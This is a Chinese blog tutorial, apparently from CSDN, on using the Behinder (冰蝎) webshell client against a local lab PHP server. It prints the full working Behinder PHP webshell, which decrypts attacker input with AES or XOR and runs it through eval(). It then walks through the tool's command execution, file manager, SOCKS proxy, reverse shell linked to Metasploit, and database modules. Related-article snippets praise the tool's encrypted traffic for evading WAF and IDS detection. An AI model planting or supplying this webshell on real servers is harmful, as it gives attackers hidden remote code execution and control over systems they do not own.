冰蝎常规使用

最新推荐文章于 2024-05-29 14:55:54 发布
最新推荐文章于 2024-05-29 14:55:54 发布
阅读量2w 收藏 69
点赞数 8
分类专栏: 工具使用 文章标签: 运维 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/105725044
版权

环境搭建

Web服务器: 本地 win2003(phpstudy搭建)
攻击工具: 冰蝎+kali

具体实施步骤

1、上传webshell

原理参考——>点击
和普通一句话木马类似,需要连接密码。此处为 pass

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

2、用冰蝎连接

在这里插入图片描述
双击增加的链接显示出phpinfo()即成功!
在这里插入图片描述

3、各个模块使用

3.1 命令执行

在这里插入图片描述

3.2 虚拟终端

在这里插入图片描述

3.3 文件管理

在这里插入图片描述

3.4 Socks代理

注:这个是开在本地的,可监控web服务器的流量
在这里插入图片描述

3.5 反弹shell

结合kali里的msf
在kali上开启侦听:
在这里插入图片描述
然后在冰蝎上点击“给我连
在这里插入图片描述
在这里插入图片描述

3.6数据库管理

在这里插入图片描述
冰蝎基本使用至此结束!
附冰蝎连接:https://github.com/rebeyond/Behinder

初学者L_言
关注
  • 8
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
办公常规使用工具.zip
04-28
办公常规使用工具.zip
打点神器behinder(冰蝎使用教程-踩坑版
最新发布
weixin_69925635的博客
05-29 226
使用命令java -jar Behinder.jar启动后如果java版本过高会报错缺少javafx,但在高版本java环境下安装会有点麻烦,所以安装一个jdk1.8进行替换更好。lhost设置为kali的ip,端口9527,并将这些信息也填在刚刚behinder建立的连接中。点击给我连,msf中exploit该漏洞,可以看到成功反弹shell。在msf中有这个漏洞,因此可以利用msf和behinder联动。将该文件利用靶机dvwa文件上传的漏洞进行上传。在攻击机上安装kali,安装完成后如下图所示。
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
wangluoanquan111的博客
04-24 1258
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
冰蝎使用
热门推荐
bring_coco的博客
03-03 1万+
一.启动 Windows环境下: 1.配置环境:冰蝎只支持jre6-jre8 可以在电脑上查看java版本 命令:java -version 2.启动 在冰蝎目录下命令行输入 命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化) 即可开启 Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令 二.使用(在本机进行实测) 环境:phpStudy+冰蝎 通过启动phpStudy,访问本机地址 成功访
电动吸引器使用常规.pdf
04-01
电动吸引器使用常规.pdf电动吸引器使用常规.pdf电动吸引器使用常规.pdf电动吸引器使用常规.pdf电动吸引器使用常规.pdf
MATLAB MOOC 课件_matlab;常规操作;基本使用_
10-03
matlab的一些常规使用及介绍。这里面包含了上课用的PPT。以及思维导图PDF格式
ECMO简易常规.pdf
04-02
ECMO简易常规.pdfECMO简易常规.pdfECMO简易常规.pdfECMO简易常规.pdfECMO简易常规.pdfECMO简易常规.pdf
常规制版工艺
12-09
课程内容: 1 常规制版工艺流程 2 制版工艺简介 2.1 原图绘制 2.1.1 总图绘制 2.1.2 原图刻制 2.2 初缩 2.3 精缩兼分步重复 2.4 生产版的复印 课程重点:本节介绍了常规制版工艺。介绍了常规制版工艺的工艺流程,...
冰蝎的安装和使用
weixin_51641247的博客
04-06 5086
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
冰蝎的原理与安装使用,2024年最新熬夜整理蚂蚁金服网络安全高级笔试题
2401_83739472的博客
04-16 1055
这个也是冰蝎的固定格式,
冰蝎
世间繁华梦一出
03-04 3351
冰蝎什么是冰蝎冰蝎的特点加密原理通信过程 什么是冰蝎? “冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大 冰蝎的特点 流量加密
Web安全-Behinder(冰蝎)Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 3581
Web安全-Behinder(冰蝎)Webshell管理工具使用
冰蝎:命令执行操作的流量分析
weixin_52544058的博客
10-15 1824
冰蝎:命令执行操作的流量分析
冰蝎|01分析基本环境搭建
weixin_43860265的博客
10-05 863
基础环境搭建-笔记 文章目录基础环境搭建-笔记1 基本环境说明2 php+nginx环境搭建2.1 安装指令2.2 php-frm配置2.3 创建测试程序2.4 nginx配置2.5 重启服务2.6 问题的解决与思考3 xshell连接linux系统4 蚁剑安装5 冰蝎安装5.1 问题的解决与思考 1 基本环境说明 虚拟机环境:vmware15+ubuntus18 nginx1.14.0+php7.2.17-0+php7.2-fpm 2 php+nginx环境搭建 参考博客:Ubuntu 18.04上ngi
冰蝎不出网反弹shell
09-06
冰蝎客户端提供了两种反弹Shell的方式,常规Shell和Meterpreter。常规Shell是一种基本的反弹Shell方式,它可以通过与目标主机建立连接来执行命令和控制目标主机。而Meterpreter是一种更高级的反弹Shell,它与metasploit框架无缝对接,可以提供更多功能和灵活性。 冰蝎还提供了虚拟终端功能,它可以通过一句话木马的Socks代理功能实现内网穿透的能力。这意味着在shell环境下进行的操作可以在内网环境下进行,同时使用起来也非常简单高效。 因此,冰蝎客户端可以通过常规Shell或Meterpreter反弹Shell的方式进行不出网的操作。同时,它还提供了虚拟终端功能来实现内网穿透。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [冰蝎 连接木马到反弹shell拿到权限全过程](https://blog.csdn.net/hackzkaq/article/details/110122723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [基于流量侧检测冰蝎webshell交互通讯](https://blog.csdn.net/qq_36334464/article/details/99978193)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值